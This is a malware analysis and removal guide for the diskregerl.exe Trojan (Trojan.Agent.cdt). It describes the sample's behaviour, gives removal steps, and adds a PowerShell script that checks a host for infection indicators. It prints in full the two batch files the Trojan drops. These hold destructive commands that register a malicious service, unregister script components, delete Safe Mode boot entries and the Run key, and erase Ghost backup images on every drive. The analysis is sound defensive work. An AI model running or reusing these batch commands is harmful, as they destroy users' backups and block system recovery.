Diskregerl.exe (Trojan.Agent.cdt) virus: manual detection and removal
Source: Internet
Author: User
File MD5: e98a4571cf72b798077d12d6c4894629
Behavior analysis:
1. Copies itself to:
   C:\windows\system32\diskregerl.exe (45,056 bytes)
2. No startup item is added (the service created by the batch file below provides auto-start instead).
3. Drops two batch files. The first one contains:

    rem set the clock back while the changes below are made
    date 2004-08-17
    time 20:00:00
    ping 127.0.0.1 -n 5
    rem install the dropped executable as an auto-start service
    sc.exe create diskregerl binPath= "C:\windows\system32\diskregerl.exe -kills" type= own type= interact start= auto DisplayName= "diskregerl Programnot"
    sc.exe description diskregerl "create network connection 2"
    rem unregister the script engine, image viewer and CHM components; jscript.dll is re-registered
    regsvr32.exe /u /s scrrun.dll
    regsvr32.exe /u /s shimgvw.dll
    regsvr32.exe /u /s itss.dll
    regsvr32.exe /u /s vbscript.dll
    regsvr32.exe /s jscript.dll
    rem remove the disk-drive class from the SafeBoot lists so Safe Mode no longer boots,
    rem then wipe the HKLM Run key
    reg.exe delete HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318} /f
    reg.exe delete HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318} /f
    reg.exe delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318} /f
    reg.exe delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318} /f
    reg.exe delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /f
    sc.exe start diskregerl
    rem delete the Windows XP system sounds
    del "C:\WINDOWS\Media\Windows XP Start.wav"
    del "C:\WINDOWS\Media\Windows XP Information Bar.wav"
    del "C:\WINDOWS\Media\Windows XP Pop-up Blocked.wav"
    regsvr32.exe /s C:\windows\system32\Programnot.dll
    ping 127.0.0.1 -n 6
    rem the profile folder name below is the analysis machine's user account name as machine-translated in the source
    del "C:\Documents and Settings\lonely and more reliable\Desktop\oky.exe" /f
    rem restore the clock, then delete the batch file itself
    date 2008-04-02
    time 08:21:33
    del %0
    exit

The second one contains:

    ping 127.0.0.1 -n 16
    rem delete Norton Ghost backup images (.gho) on drives C: through I:
    cmd.exe /c del /f /s /q c:*.gho
    cmd.exe /c del /f /s /q d:*.gho
    cmd.exe /c del /f /s /q e:*.gho
    cmd.exe /c del /f /s /q f:*.gho
    cmd.exe /c del /f /s /q g:*.gho
    cmd.exe /c del /f /s /q h:*.gho
    cmd.exe /c del /f /s /q I:*.gho
    regsvr32.exe /s C:\windows\system32\Programnot.dll
    del %0
    exit
4. Connects to the following website and floods it with traffic:
   http://www.xerty.cn/hangzhou/300center.htm
5. The sample also contains code to maliciously lock the IE home page, but this code is not activated.
Solution:
1. Restart the computer.
2. Delete the file:
   C:\windows\system32\diskregerl.exe
3. If the file still cannot be deleted after the restart, download IceSword (available from down.45it.com) and use it to end the process first.
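The following host check is an added example, not part of the original write-up: it looks for the indicators the batch files leave behind (dropped files, the diskregerl service, the missing SafeBoot entries, the unregistered script engines and the wiped Run key) so that an infection and, afterwards, a successful clean-up can be confirmed. It assumes an elevated PowerShell 4.0 or later session on the affected host, and it detects the regsvr32 /u step by the absence of the components' COM ProgIDs under HKCR (an assumption about how those DLLs unregister themselves).

```powershell
# Added example: indicator check for the diskregerl.exe (Trojan.Agent.cdt) behaviour above.
# Assumes an elevated PowerShell 4.0+ session (Get-FileHash) on the suspected Windows host.
$Findings = @()
$Sys32 = Join-Path $env:SystemRoot 'system32'

# 1. Dropped executable and helper DLL; the MD5 is the one given in the write-up.
$Exe = Join-Path $Sys32 'diskregerl.exe'
if (Test-Path $Exe) {
    $Hash = (Get-FileHash -Path $Exe -Algorithm MD5).Hash
    $Findings += "file present: $Exe (MD5 $Hash, write-up MD5 e98a4571cf72b798077d12d6c4894629)"
}
if (Test-Path (Join-Path $Sys32 'Programnot.dll')) { $Findings += 'file present: Programnot.dll' }

# 2. Persistence: the first batch registers the executable as an auto-start service.
$Svc = Get-Service -Name 'diskregerl' -ErrorAction SilentlyContinue
if ($Svc) { $Findings += "service present: diskregerl (status $($Svc.Status))" }

# 3. Safe Mode sabotage: the disk-drive class GUID must be listed under SafeBoot\Minimal
#    and SafeBoot\Network; the batch deletes it so Safe Mode can no longer start.
$DiskClass = '{4D36E967-E325-11CE-BFC1-08002BE10318}'
foreach ($Mode in 'Minimal', 'Network') {
    $Key = "HKLM:\SYSTEM\CurrentControlSet\Control\SafeBoot\$Mode\$DiskClass"
    if (-not (Test-Path $Key)) { $Findings += "SafeBoot entry missing: $Key" }
}

# 4. regsvr32 /u on vbscript.dll and scrrun.dll: their ProgIDs disappear from HKCR
#    (assumption: these DLLs remove their ProgID keys on DllUnregisterServer).
foreach ($ProgId in 'VBScript', 'Scripting.FileSystemObject') {
    if (-not (Test-Path "Registry::HKEY_CLASSES_ROOT\$ProgId\CLSID")) {
        $Findings += "COM ProgID unregistered: $ProgId"
    }
}

# 5. The batch deletes the whole HKLM Run key, which is always present on a healthy host.
if (-not (Test-Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run')) {
    $Findings += 'HKLM Run key deleted'
}

if ($Findings.Count -eq 0) { 'No diskregerl indicators found.' } else { $Findings }
```

Run it once before and once after the removal steps; a clean host reports nothing, while any SafeBoot or ProgID finding that remains after the file is gone still needs repair (reboot into Safe Mode will fail until the SafeBoot entries are restored).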